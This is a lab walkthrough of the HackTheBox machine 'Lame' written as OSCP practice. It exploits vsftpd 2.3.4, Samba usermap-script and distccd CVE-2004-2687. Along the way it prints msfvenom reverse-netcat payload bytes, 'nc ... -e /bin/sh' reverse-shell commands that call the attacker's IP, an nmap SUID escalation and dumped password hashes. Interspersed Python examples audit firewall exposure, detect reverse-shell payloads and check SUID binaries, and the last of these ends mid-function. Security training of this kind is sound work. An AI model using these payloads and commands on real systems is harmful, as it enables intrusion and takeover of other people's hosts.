Follow along on my OSCP journey: this is target 3 of TJNull's OSCP list.
How to use this walkthrough?
To avoid the typical answer-on-a-plate type of walkthrough, I have decided to follow the TryHackMe idea of giving you some hints along the way to help you when you struggle and keep the Try Harder mantra real.
Let’s go!
Enumeration
I use Tib3rius’ multi-threaded Autorecon which combines a couple of different tools to enumerate and scan services. It creates a simple file structure and provides you a nice overview of the services scanned.
python3 /opt/AutoRecon/autorecon.py -cs 25 -vv -o /home/kali/Documents/HTB/lab/ 10.10.10.3
I thought I might show what the output looks like for this machine in the scans/ folder:
-rw-r--r-- 1 kali kali 5391 Nov 24 04:52 _commands.log
-rw-r--r-- 1 kali kali 1134 Nov 24 04:51 enum4linux.txt
-rw-r--r-- 1 kali kali 5115 Nov 24 04:52 _full_tcp_nmap.txt
-rw-r--r-- 1 kali kali 2880 Nov 24 04:51 _manual_commands.txt
-rw-r--r-- 1 kali kali 131 Nov 24 04:53 _patterns.log
-rw-r--r-- 1 kali kali 3502 Nov 24 04:51 _quick_tcp_nmap.txt
-rw-r--r-- 1 kali kali 63 Nov 24 04:51 smbclient.txt
-rw-r--r-- 1 kali kali 518 Nov 24 04:51 smbmap-execute-command.txt
-rw-r--r-- 1 kali kali 3602 Nov 24 04:51 smbmap-list-contents.txt
-rw-r--r-- 1 kali kali 2186 Nov 24 04:51 smbmap-share-permissions.txt
-rw-r--r-- 1 kali kali 7385 Nov 24 04:59 tcp_139_smb_nmap.txt
-rw-r--r-- 1 kali kali 1265 Nov 24 04:51 tcp_21_ftp_nmap.txt
-rw-r--r-- 1 kali kali 2939 Nov 24 04:51 tcp_22_ssh_nmap.txt
-rw-r--r-- 1 kali kali 1549 Nov 24 04:53 tcp_3632_distcc_nmap.txt
-rw-r--r-- 1 kali kali 7385 Nov 24 04:58 tcp_445_smb_nmap.txt
-rw-r--r-- 1 kali kali 2208 Nov 24 04:58 _top_20_udp_nmap.txt
So you get the nmap-specific scripts at the bottom and the service-specific scripts above. You can obviously refine the tool or use your own tools afterwards; it usually gives a really nice picture.
Nmap
While it runs, I usually look at the _quick_tcp_nmap.txt file while waiting for _full_tcp_nmap.txt:
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 63 vsftpd 2.3.4
22/tcp open ssh syn-ack ttl 63 OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp open netbios-ssn syn-ack ttl 63 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn syn-ack ttl 63 Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open distccd syn-ack ttl 63 distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
We have an FTP server, SSH, an SMB server and a distccd service on this machine. Let's explore each of them; it seems we might have multiple paths of entry.
FTP — 21
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 63 vsftpd 2.3.4
|_banner: 220 (vsFTPd 2.3.4)
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
We can see that anonymous access is enabled, let’s check it out.
To log in we simply use the username anonymous with an empty password:
kali@kali:~/Documents/HTB/lab/10.10.10.3/exploit$ ftp lame.htb
Connected to lame.htb.
220 (vsFTPd 2.3.4)
Name (lame.htb:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
After logging in, it seems there is nothing we can do or get: the directory is empty and we can't leave the folder.
ftp> pwd
257 "/"
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 0 65534 4096 Mar 17 2010 .
drwxr-xr-x 2 0 65534 4096 Mar 17 2010 ..
226 Directory send OK.
ftp> cd ..
250 Directory successfully changed.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 0 65534 4096 Mar 17 2010 .
drwxr-xr-x 2 0 65534 4096 Mar 17 2010 ..
Let's check whether this version is vulnerable, using searchsploit:
vsftpd 2.0.5 - 'CWD' (Authenticated) Remote Memory Consumption| exploits/linux/dos/5814.pl
vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (1)| exploits/windows/dos/31818.sh
vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (2)| exploits/windows/dos/31819.pl
vsftpd 2.3.2 - Denial of Service | exploits/linux/dos/16270.c
vsftpd 2.3.4 - Backdoor Command Execution (Metasploit) | exploits/unix/remote/17491.rb
This looks really good, but we can't use that exploit because we're training for OSCP and it is a Metasploit module…
HINT
Are the exploits from exploit-db the only ones available?
.
.
.
.
We can look for another one. A quick Google search turns up:
https://github.com/ahervias77/vsftpd-2.3.4-exploit
The repository also gives an example of how to use it:
kali@kali:~/Documents/HTB/lab/10.10.10.3/exploit$ python3 vsftpd_234_exploit.py 10.10.10.3 21 id
[*] Attempting to trigger backdoor...
[+] Triggered backdoor
[*] Attempting to connect to backdoor...
[!] Failed to connect to backdoor on 10.10.10.3:6200
That didn't work; let's try another script:
kali@kali:~/Documents/HTB/lab/10.10.10.3/exploit$ wget https://gist.githubusercontent.com/thaisingle/e2af5a83f06dc91fdf60faa23f43ffec/raw/ba8505125ccd2f9ae30c56903f2e817aa96b1854/vsFtpdBackdoor.py
kali@kali:~/Documents/HTB/lab/10.10.10.3/exploit$ python vsFtpdBackdoor.py 10.10.10.3 21
[*] Try to open port 6200
[*] Open Port 6200 completed
[!] Cannot get the shell
Let's try manually. From the scripts, it seems that after a username and password are sent to the FTP server, a backdoor opens on port 6200; let's try to connect to it.
kali@kali:~/Documents/HTB/lab$ telnet 10.10.10.3 21
Trying 10.10.10.3...
Connected to 10.10.10.3.
Escape character is '^]'.
220 (vsFTPd 2.3.4)
USER qwertyuuu:)
331 Please specify the password.
PASS qweerrtt
421 Timeout.
Connection closed by foreign host.
We then try to connect to the backdoor with netcat and telnet, but both keep timing out.
nc 10.10.10.3 6200 -e /bin/bash
(UNKNOWN) [10.10.10.3] 6200 (?) : Connection timed out
telnet 10.10.10.3 6200
Trying 10.10.10.3...
telnet: Unable to connect to remote host: Connection timed out
BONUS HINT
What could stop the backdoor from working?
.
.
.
.
I first thought the backdoor had been patched, but after getting root through the other methods I checked what was going on. netstat showed plenty of services listening on the machine that were not exposed to us.
root@lame:/# netstat -tnlp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:53728 0.0.0.0:* LISTEN 5604/rmiregistry
tcp 0 0 0.0.0.0:512 0.0.0.0:* LISTEN 5435/xinetd
tcp 0 0 0.0.0.0:513 0.0.0.0:* LISTEN 5435/xinetd
tcp 0 0 0.0.0.0:2049 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:514 0.0.0.0:* LISTEN 5435/xinetd
tcp 0 0 0.0.0.0:51814 0.0.0.0:* LISTEN 5335/rpc.mountd
tcp 0 0 0.0.0.0:8009 0.0.0.0:* LISTEN 5563/jsvc
tcp 0 0 0.0.0.0:6697 0.0.0.0:* LISTEN 5614/unrealircd
tcp 0 0 0.0.0.0:3306 0.0.0.0:* LISTEN 5158/mysqld
tcp 0 0 0.0.0.0:1099 0.0.0.0:* LISTEN 5604/rmiregistry
tcp 0 0 0.0.0.0:6667 0.0.0.0:* LISTEN 5614/unrealircd
tcp 0 0 0.0.0.0:139 0.0.0.0:* LISTEN 5413/smbd
tcp 0 0 0.0.0.0:5900 0.0.0.0:* LISTEN 5627/Xtightvnc
tcp 0 0 0.0.0.0:35407 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN 4613/portmap
tcp 0 0 0.0.0.0:6000 0.0.0.0:* LISTEN 5627/Xtightvnc
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN 5583/apache2
tcp 0 0 0.0.0.0:56690 0.0.0.0:* LISTEN 4631/rpc.statd
tcp 0 0 0.0.0.0:8787 0.0.0.0:* LISTEN 5608/ruby
tcp 0 0 0.0.0.0:8180 0.0.0.0:* LISTEN 5563/jsvc
tcp 0 0 0.0.0.0:1524 0.0.0.0:* LISTEN 5435/xinetd
tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN 5435/xinetd
tcp 0 0 10.10.10.3:53 0.0.0.0:* LISTEN 5011/named
tcp 0 0 127.0.0.1:53 0.0.0.0:* LISTEN 5011/named
tcp 0 0 0.0.0.0:23 0.0.0.0:* LISTEN 5435/xinetd
tcp 0 0 0.0.0.0:5432 0.0.0.0:* LISTEN 5240/postgres
tcp 0 0 0.0.0.0:25 0.0.0.0:* LISTEN 5403/master
tcp 0 0 127.0.0.1:953 0.0.0.0:* LISTEN 5011/named
tcp 0 0 0.0.0.0:445 0.0.0.0:* LISTEN 5413/smbd
This really looked like a firewall was in place, which I confirmed. Only the specific services we saw in our scan are allowed through:
root@lame:/# iptables -L
...
Chain ufw-user-input (1 references)
target prot opt source destination
ACCEPT tcp -- anywhere anywhere tcp dpt:ssh
ACCEPT udp -- anywhere anywhere udp dpt:ssh
ACCEPT tcp -- anywhere anywhere tcp dpt:ftp
ACCEPT tcp -- anywhere anywhere tcp dpt:distcc
ACCEPT udp -- anywhere anywhere udp dpt:distcc
ACCEPT tcp -- anywhere anywhere tcp dpt:netbios-ssn
ACCEPT udp -- anywhere anywhere udp dpt:netbios-ssn
ACCEPT tcp -- anywhere anywhere tcp dpt:microsoft-ds
ACCEPT udp -- anywhere anywhere udp dpt:microsoft-ds
...
Let's trigger the backdoor again and use it from inside the machine as an internal user. After triggering it, we can now see it in the netstat output!!
root@lame:/# netstat -tnlp | grep 6200
tcp 0 0 0.0.0.0:6200 0.0.0.0:* LISTEN 6605/vsftpd
Let's try to connect to it as a regular user:
root@lame:/# su makis
sh-3.2$ id
uid=1003(makis) gid=1003(makis) groups=4(adm),112(admin),1003(makis)
sh-3.2$ bash
makis@lame:/$ nc localhost 6200
id
uid=0(root) gid=0(root)
That was it: the software wasn't patched, but the firewall stopped us from reaching the backdoor from the outside.
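The netstat and ufw output above is exactly the comparison that explains why the backdoor never answered from outside. As an added example (my code, not from the original post), the following Python script automates it: it parses `netstat -tnlp` and the ACCEPT rules of the ufw chain and reports, for every listening TCP port, whether it is exposed, filtered by the host firewall, or bound to loopback only. The sample text is a constructed subset of the lines shown above, and the service-name-to-port table holds the standard /etc/services assignments for the names that appear in the rules.

```python
from __future__ import annotations

import re
from dataclasses import dataclass

# Standard /etc/services names used in the ufw rule dump, mapped to their ports.
SERVICE_PORTS = {"ftp": 21, "ssh": 22, "netbios-ssn": 139, "microsoft-ds": 445, "distcc": 3632}

# Constructed sample: a subset of the netstat -tnlp lines from the walkthrough.
NETSTAT_SAMPLE = """\
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:6200 0.0.0.0:* LISTEN 6605/vsftpd
tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN 5435/xinetd
tcp 0 0 0.0.0.0:3306 0.0.0.0:* LISTEN 5158/mysqld
tcp 0 0 0.0.0.0:5900 0.0.0.0:* LISTEN 5627/Xtightvnc
tcp 0 0 0.0.0.0:2049 0.0.0.0:* LISTEN -
tcp 0 0 10.10.10.3:53 0.0.0.0:* LISTEN 5011/named
tcp 0 0 127.0.0.1:53 0.0.0.0:* LISTEN 5011/named
tcp 0 0 127.0.0.1:953 0.0.0.0:* LISTEN 5011/named
tcp 0 0 0.0.0.0:445 0.0.0.0:* LISTEN 5413/smbd
"""

# Constructed sample: the ufw-user-input chain as printed by iptables -L.
UFW_SAMPLE = """\
Chain ufw-user-input (1 references)
target prot opt source destination
ACCEPT tcp -- anywhere anywhere tcp dpt:ssh
ACCEPT udp -- anywhere anywhere udp dpt:ssh
ACCEPT tcp -- anywhere anywhere tcp dpt:ftp
ACCEPT tcp -- anywhere anywhere tcp dpt:distcc
ACCEPT tcp -- anywhere anywhere tcp dpt:netbios-ssn
ACCEPT tcp -- anywhere anywhere tcp dpt:microsoft-ds
"""


@dataclass
class Listener:
    addr: str
    port: int
    program: str


def parse_netstat(text: str) -> list[Listener]:
    """Extract TCP listeners (bind address, port, PID/program) from netstat -tnlp output."""
    listeners = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 7 or fields[0] != "tcp" or fields[5] != "LISTEN":
            continue  # header, non-TCP entry, or not a listening socket
        addr, port = fields[3].rsplit(":", 1)
        listeners.append(Listener(addr, int(port), fields[6]))
    return listeners


def parse_allowed_tcp_ports(text: str) -> set[int]:
    """Collect destination ports from the TCP ACCEPT rules of an iptables/ufw listing."""
    allowed = set()
    for line in text.splitlines():
        m = re.match(r"ACCEPT\s+tcp\s+.*\bdpt:(\S+)", line)
        if not m:
            continue
        dpt = m.group(1)
        port = int(dpt) if dpt.isdigit() else SERVICE_PORTS.get(dpt)
        if port is not None:  # unknown service names are skipped, not guessed
            allowed.add(port)
    return allowed


def audit(netstat_text: str, rules_text: str) -> dict[int, tuple[str, str]]:
    """Map each listening port to (state, program): exposed, filtered or loopback-only."""
    allowed = parse_allowed_tcp_ports(rules_text)
    by_port: dict[int, list[Listener]] = {}
    for lst in parse_netstat(netstat_text):
        by_port.setdefault(lst.port, []).append(lst)
    report = {}
    for port, entries in sorted(by_port.items()):
        external = [e for e in entries if not e.addr.startswith("127.")]
        if not external:
            state = "loopback-only"  # unreachable from the network regardless of the firewall
        elif port in allowed:
            state = "exposed"        # bound on a routable address and permitted by ufw
        else:
            state = "filtered"       # listening, but the host firewall drops inbound traffic
        report[port] = (state, entries[0].program)
    return report


if __name__ == "__main__":
    for port, (state, program) in audit(NETSTAT_SAMPLE, UFW_SAMPLE).items():
        print(f"{port:>5}  {state:<13} {program}")
```

Against a real host, feed it the full `netstat -tnlp` and `iptables -L` output: the ports that come back as `filtered` are exactly the services a network scan will never show you but that a local user, or a backdoor that binds a fresh port, can still reach.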
SSH — 22
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
|_banner: SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1
| ssh-auth-methods:
| Supported authentication methods:
| publickey
|_ password
Nothing interesting for SSH in searchsploit or online other than user enumeration.
SAMBA — 139/445
We get the following output from our smbmap files; the commands that worked are:
smbmap -H 10.10.10.3 -P 139
After that we added the -R parameter to list the contents recursively:
smbmap -H 10.10.10.3 -P 139 -R
For all the different commands used to enumerate SMB, check the _commands.log file from AutoRecon and grep for smb.
Here is the full output from both files:
[+] IP: 10.10.10.3:445 Name: lame.htb
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
tmp READ, WRITE oh noes!
opt NO ACCESS
IPC$ NO ACCESS IPC Service
ADMIN$ NO ACCESS IPC Service
.\tmp\*
dr--r--r-- 0 Tue Nov 24 04:56:37 2020 .
dw--w--w-- 0 Sat Oct 31 03:33:57 2020 ..
dr--r--r-- 0 Tue Nov 24 04:43:42 2020 .ICE-unix
dw--w--w-- 0 Tue Nov 24 04:44:15 2020 vmware-root
dr--r--r-- 0 Tue Nov 24 04:44:10 2020 .X11-unix
fw--w--w-- 11 Tue Nov 24 04:44:10 2020 .X0-lock
fw--w--w-- 0 Tue Nov 24 04:44:48 2020 5563.jsvc_up
fw--w--w-- 1600 Tue Nov 24 04:43:40 2020 vgauthsvclog.txt.0
.\tmp\.X11-unix\*
dr--r--r-- 0 Tue Nov 24 04:44:10 2020 .
dr--r--r-- 0 Tue Nov 24 04:56:37 2020 ..
fr--r--r-- 0 Tue Nov 24 04:44:10 2020 X0
Nothing of much interest. On the other hand, it seems this Samba version is vulnerable:
kali@kali:~/Documents/HTB/lab/10.10.10.3/scans$ searchsploit samba 3.0.20
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' | exploits/unix/remote/16320.rb
Samba < 3.0.20 - Remote Heap Overflow | exploits/linux/remote/7701.txt
It seems that the only exploit shown is a Metasploit module. Again, this is a great opportunity to avoid using Metasploit, so let's find one on the internet.
This one looks really good, but …
HINT
This won’t work straight away, check the code and find something that doesn’t look right.
.
.
.
.
We need to modify the script because the payload parameters baked into it (the LHOST and LPORT of the shellcode) aren't ours.
Custom Exploit Time!
...
# Shellcode:
# msfvenom -p cmd/unix/reverse_netcat LHOST=10.0.0.35 LPORT=9999 -f python
buf = ""
buf += "\x6d\x6b\x66\x69\x66\x6f\x20\x2f\x74\x6d\x70\x2f\x6b"
buf += "\x62\x67\x61\x66\x3b\x20\x6e\x63\x20\x31\x30\x2e\x30"
buf += "\x2e\x30\x2e\x33\x35\x20\x39\x39\x39\x39\x20\x30\x3c"
buf += "\x2f\x74\x6d\x70\x2f\x6b\x62\x67\x61\x66\x20\x7c\x20"
buf += "\x2f\x62\x69\x6e\x2f\x73\x68\x20\x3e\x2f\x74\x6d\x70"
buf += "\x2f\x6b\x62\x67\x61\x66\x20\x32\x3e\x26\x31\x3b\x20"
buf += "\x72\x6d\x20\x2f\x74\x6d\x70\x2f\x6b\x62\x67\x61\x66"
buf += "\x20"
...
Let's create our own payload:
kali@kali:~/Documents/HTB/lab/10.10.10.3/exploit$ msfvenom -p cmd/unix/reverse_netcat LHOST=attacker_ip LPORT=5555 -f python
No encoder specified, outputting raw payload
Payload size: 89 bytes
Final size of python file: 444 bytes
buf = b""
buf += b"\x6d\x6b\x66\x69\x66\x6f\x20\x2f\x74\x6d\x70\x2f\x6a"
buf += b"\x75\x6f\x6b\x3b\x20\x6e\x63\x20\x31\x30\x2e\x31\x30"
buf += b"\x2e\x31\x34\x2e\x34\x36\x20\x35\x35\x35\x35\x20\x30"
buf += b"\x3c\x2f\x74\x6d\x70\x2f\x6a\x75\x6f\x6b\x20\x7c\x20"
buf += b"\x2f\x62\x69\x6e\x2f\x73\x68\x20\x3e\x2f\x74\x6d\x70"
buf += b"\x2f\x6a\x75\x6f\x6b\x20\x32\x3e\x26\x31\x3b\x20\x72"
buf += b"\x6d\x20\x2f\x74\x6d\x70\x2f\x6a\x75\x6f\x6b"
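The `-f python` output above is just the payload's bytes written as `\x..` escapes, so anyone reviewing a downloaded exploit, or an analyst looking at a suspicious script, can read what it is going to execute without running it. As an added example (my code, not from the original post or from the exploit's author), this Python snippet decodes such a blob and then applies two regexes that recognise the reverse-shell shapes seen in this walkthrough (the mkfifo/nc pipe that msfvenom's cmd/unix/reverse_netcat emits, and the `nc host port -e /bin/sh` form), extracting the callback host and port. That is the kind of check that belongs in a script-review step or a process command-line monitoring rule. The embedded blob is a copy of the 89-byte payload shown above.

```python
import re

# Copy of the 89-byte "-f python" blob from the walkthrough, with single backslashes as msfvenom emits them.
PAGE_BLOB = r'''
buf = b""
buf += b"\x6d\x6b\x66\x69\x66\x6f\x20\x2f\x74\x6d\x70\x2f\x6a"
buf += b"\x75\x6f\x6b\x3b\x20\x6e\x63\x20\x31\x30\x2e\x31\x30"
buf += b"\x2e\x31\x34\x2e\x34\x36\x20\x35\x35\x35\x35\x20\x30"
buf += b"\x3c\x2f\x74\x6d\x70\x2f\x6a\x75\x6f\x6b\x20\x7c\x20"
buf += b"\x2f\x62\x69\x6e\x2f\x73\x68\x20\x3e\x2f\x74\x6d\x70"
buf += b"\x2f\x6a\x75\x6f\x6b\x20\x32\x3e\x26\x31\x3b\x20\x72"
buf += b"\x6d\x20\x2f\x74\x6d\x70\x2f\x6a\x75\x6f\x6b"
'''

# Shape 1: msfvenom cmd/unix/reverse_netcat -> "mkfifo F; nc HOST PORT 0<F | /bin/sh ..."
# The back-reference insists that the FIFO read by nc is the one just created.
FIFO_NC_RE = re.compile(
    r"mkfifo\s+(?P<fifo>\S+);\s*nc\s+(?P<host>\S+)\s+(?P<port>\d+)\s+0<(?P=fifo)\s*\|\s*/bin/sh"
)
# Shape 2: the plain "nc HOST PORT -e /bin/sh" (or bash) used later in the walkthrough.
NC_EXEC_RE = re.compile(r"\bnc\s+(?P<host>\S+)\s+(?P<port>\d+)\s+-e\s+/bin/(?:ba)?sh")


def decode_python_format(blob: str) -> bytes:
    """Rebuild the raw bytes from msfvenom's `buf += b"\\x.."` lines; nothing is executed."""
    out = bytearray()
    for line in blob.splitlines():
        m = re.match(r'\s*buf\s*\+=\s*b?"((?:\\x[0-9a-fA-F]{2})*)"\s*$', line)
        if m:
            out += bytes(int(h, 16) for h in re.findall(r"\\x([0-9a-fA-F]{2})", m.group(1)))
    return bytes(out)


def classify_command(cmd: str) -> dict:
    """Say whether a shell command matches a known reverse-shell shape and where it calls back to."""
    for kind, pattern in (("mkfifo-netcat-pipe", FIFO_NC_RE), ("netcat-exec", NC_EXEC_RE)):
        m = pattern.search(cmd)
        if m:
            return {"reverse_shell": True, "kind": kind,
                    "callback": (m.group("host"), int(m.group("port")))}
    return {"reverse_shell": False, "kind": None, "callback": None}


def analyze_blob(blob: str) -> dict:
    """Decode a -f python blob and classify the command it contains."""
    cmd = decode_python_format(blob).decode("ascii", errors="replace")
    return {"command": cmd, **classify_command(cmd)}


if __name__ == "__main__":
    result = analyze_blob(PAGE_BLOB)
    print("decoded :", result["command"])
    print("verdict :", result["kind"], "->", result["callback"])
```

The decoder only accepts lines of the exact `buf += b"..."` form, so it is safe to point at any file; and because the regexes anchor on the mkfifo/nc/sh structure rather than on a specific IP, the same rule fires on the first blob in the script (callback 10.0.0.35:9999) and on the author's replacement (10.10.14.46:5555).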
We replace the payload in the script with our own, set up a listener and run it.
We had to install a dependency for the script to run:
pip install pysmb
Let's set up a listener:
nc -nlvp 5555
Now, we are good to run our script!
python samba-usermap-exploit.py lame.htb
Let's go and check our listener:
kali@kali:~/Documents/HTB/lab$ nc -nlvp 5555
listening on [any] 5555 ...
connect to [attacker_ip] from (UNKNOWN) [10.10.10.3] 46428
ls
bin
boot
cdrom
dev
etc
home
initrd
initrd.img
initrd.img.old
lib
lost+found
media
mnt
nohup.out
opt
proc
root
sbin
srv
sys
tmp
usr
var
vmlinuz
vmlinuz.old
id
uid=0(root) gid=0(root)
python -c 'import pty; pty.spawn("/bin/bash")'
root@lame:/#
LET’S GOO!! We get instant root.
Distccd — 3632
A quick Google search to understand what this is:
distccd is the server for the distcc(1) distributed compiler. It accepts and runs compilation jobs for network clients.
PORT STATE SERVICE REASON VERSION
3632/tcp open distccd syn-ack ttl 63 distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
| distcc-cve2004-2687:
| VULNERABLE:
| distcc Daemon Command Execution
| State: VULNERABLE (Exploitable)
| IDs: CVE:CVE-2004-2687
| Risk factor: High CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
| Allows executing of arbitrary commands on systems running distccd 3.1 and
| earlier. The vulnerability is the consequence of weak service configuration.
|
| Disclosure date: 2002-02-01
| Extra information:
|
| uid=1(daemon) gid=1(daemon) groups=1(daemon)
|
| References:
| <https://distcc.github.io/security.html>
| <https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2687>
|_ <https://nvd.nist.gov/vuln/detail/CVE-2004-2687>
Let’s look at possible exploits with searchsploit:
DistCC Daemon - Command Execution (Metasploit)| exploits/multiple/remote/9915.rb
Again, as true OSCP trainees we can't use Metasploit, so let's quickly Google for that exploit.
https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855
kali@kali:~/Documents/HTB/lab/10.10.10.3/exploit$ wget https://gist.githubusercontent.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855/raw/48ab4eb0bd69cac67bc97fbe182e39e5ded99f9f/distccd_rce_CVE-2004-2687.py
The creator explains how to use it:
local>nc -lvp 1403
local>./disccd_exploit.py -t victim_IP -p 3632 -c "nc attacker_IP 1403 -e /bin/sh"
We set up a listener:
nc -nlvp 5555
Now we can just run the exploit:
kali@kali:~/Documents/HTB/lab/10.10.10.3/exploit$ python distccd_rce_CVE-2004-2687.py -t 10.10.10.3 -p 3632 -c "nc 10.10.14.46 5555 -e /bin/sh"
[OK] Connected to remote service
[KO] Socket Timeout
And … we get the shell!
kali@kali:~/Documents/HTB/lab/10.10.10.3$ nc -nlvp 5555
listening on [any] 5555 ...
connect to [10.10.14.46] from (UNKNOWN) [10.10.10.3] 50543
id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
Time for some shell upgrade 😉
- python -c 'import pty; pty.spawn("/bin/bash")'
- Ctrl+Z
- stty raw -echo
- fg (nothing will show on the screen, just type enter after the command a couple of times)
Let's get the user flag:
daemon@lame:/home/makis$ ls -la
total 28
drwxr-xr-x 2 makis makis 4096 Mar 14 2017 .
drwxr-xr-x 6 root root 4096 Mar 14 2017 ..
-rw------- 1 makis makis 1107 Mar 14 2017 .bash_history
-rw-r--r-- 1 makis makis 220 Mar 14 2017 .bash_logout
-rw-r--r-- 1 makis makis 2928 Mar 14 2017 .bashrc
-rw-r--r-- 1 makis makis 586 Mar 14 2017 .profile
-rw-r--r-- 1 makis makis 0 Mar 14 2017 .sudo_as_admin_successful
-rw-r--r-- 1 makis makis 33 Nov 26 03:48 user.txt
daemon@lame:/home/makis$ cat user.txt
Now we have an interactive shell and the user flag, let’s get root!
Getting Root
The way I go about getting root is the following: I’ll look for some quick wins and then run some enumeration scripts to help me find some weaknesses.
Quick Wins
sudo -l → sudo permissions
ls -la /opt/ → looking for interesting executables or files
ls -la /var/www/; ls -la /var/www/html → possible configuration files with a DB password or even a user password.
ls -la /etc/passwd; ls -la /etc/shadow → misconfigured permissions (write on passwd and read on shadow)
Nothing of interest unfortunately.
Enumeration scripts
This is where we upload our linpeas, LinEnum and Exploit Suggester.
On our attacking machine
We start by setting up a simple Python HTTP server:
sudo python -m SimpleHTTPServer 80
On the victim’s machine
We look for a writable folder, wget the scripts we want, give them execute permissions and finally run them:
cd /tmp/
wget http://attacking_ip/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
It seems that nothing was output; sometimes you need to execute the script directly with bash:
bash linpeas.sh
There are a lot of interesting items in the linpeas output.
HINT
What seems to be the fastest way to get root out of all the shiny things?
.
.
.
.
Let's look at the relevant items in the scan.
VNC
This seems juicy:
root 5625 0.0 2.3 13924 12008 ? S 06:30 0:00 Xtightvnc :0 -desktop X -auth /root/.Xauthority -geometry 1024x768 -depth 24 -rfbwait 120000 -rfbauth /root/.vnc/passwd -rfbport 5900 -fp /usr/X11R6/lib/X11/fonts/Type1/,/usr/X11R6/lib/X11/fonts/Speedo/,/usr/X11R6/lib/X11/fonts/misc/,/usr/X11R6/lib/X11/fonts/75dpi/,/usr/X11R6/lib/X11/fonts/100dpi/,/usr/share/fonts/X11/misc/,/usr/share/fonts/X11/Type1/,/usr/share/fonts/X11/75dpi/,/usr/share/fonts/X11/100dpi/ -co /etc/X11/rgb
But we don't have a simple way to expose the service externally, because we have no credentials to set up any SSH tunnelling. On top of that we have no hint of the VNC password, so we would need to brute-force it.
No password for the MySQL root user
Let's check MySQL for some juicy content:
mysql -u root
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 7
Server version: 5.0.51a-3ubuntu5 (Ubuntu)
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql> show databases;
show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| dvwa |
| metasploit |
| mysql |
| owasp10 |
| tikiwiki |
| tikiwiki195 |
+--------------------+
These look like databases belonging to other web security challenges (DVWA, OWASP, TikiWiki), because the content doesn't seem to match our box.
mysql> use dvwa
use dvwa
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables;
show tables;
+----------------+
| Tables_in_dvwa |
+----------------+
| guestbook |
| users |
+----------------+
2 rows in set (0.00 sec)
mysql> select * from users;
select * from users;
| id | first | last | user | password |
| 1 | admin | admin | admin | 5f4dcc3b5aa765d61d8327deb882cf99
| 2 | Gordon | Brown | gordonb | e99a18c428cb38d5f260853678922e03
| 3 | Hack | Me | 1337 | 8d3533d75ae2c3966d7e0d4fcc69216b
| 4 | Pablo | Picasso | pablo | 0d107d09f5bbe40cade3de5c71e9e9b7
| 5 | Bob | Smith | smithy | 5f4dcc3b5aa765d61d8327deb882cf99
SUID
This looks very promising: a SUID nmap is a classic.
As for /usr/bin/at, it is SUID but owned by daemon, which we already are, so we can't get much out of that:
daemon@lame:/var/www$ ls -la /usr/bin/at
-rwsr-sr-x 1 daemon daemon 38464 Feb 20 2007 /usr/bin/at
GTFOBins entry for nmap:
/usr/bin/nmap --interactive
!sh
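The Quick Wins list above and this SUID section are permission checks that can be scripted, both for the attacker's enumeration and, more usefully, for a periodic hardening audit. As an added example (my code, not from the original post and not from linpeas), here is a Python audit that reads `ls -la` style lines and flags setuid-root binaries (critical when the name is on a small, illustrative subset of the GTFOBins shell-spawning list that includes nmap; review otherwise), setuid binaries owned by an unprivileged account such as the /usr/bin/at line above (informational only, as the post notes), and the writable /etc/passwd and readable /etc/shadow misconfigurations. The listing is constructed: the at line is copied from above, the other lines are made up, and the nmap size and date are placeholders.

```python
import os

# Illustrative subset of binaries GTFOBins lists as giving a shell when setuid-root.
# nmap is the one used in this box; the others are well-known entries.
SHELL_SPAWNERS = {"nmap", "find", "vim", "bash", "python"}

# Constructed listing. The /usr/bin/at line is from the walkthrough; the rest are
# placeholders (sizes and dates are not from the box) showing healthy entries.
SAMPLE_LISTING = """\
-rwsr-sr-x 1 daemon daemon 38464 Feb 20 2007 /usr/bin/at
-rwsr-xr-x 1 root root 780676 Apr 8 2008 /usr/bin/nmap
-rwsr-xr-x 1 root root 37140 Apr 8 2008 /usr/bin/passwd
-rw-r--r-- 1 root root 1742 Mar 14 2017 /etc/passwd
-rw-r----- 1 root shadow 1126 Mar 14 2017 /etc/shadow
"""


def parse_ls_line(line: str):
    """Split one `ls -l` line into (mode, owner, group, path). The date is 3 tokens, so
    splitting into 9 fields keeps a path containing spaces intact."""
    fields = line.split(None, 8)
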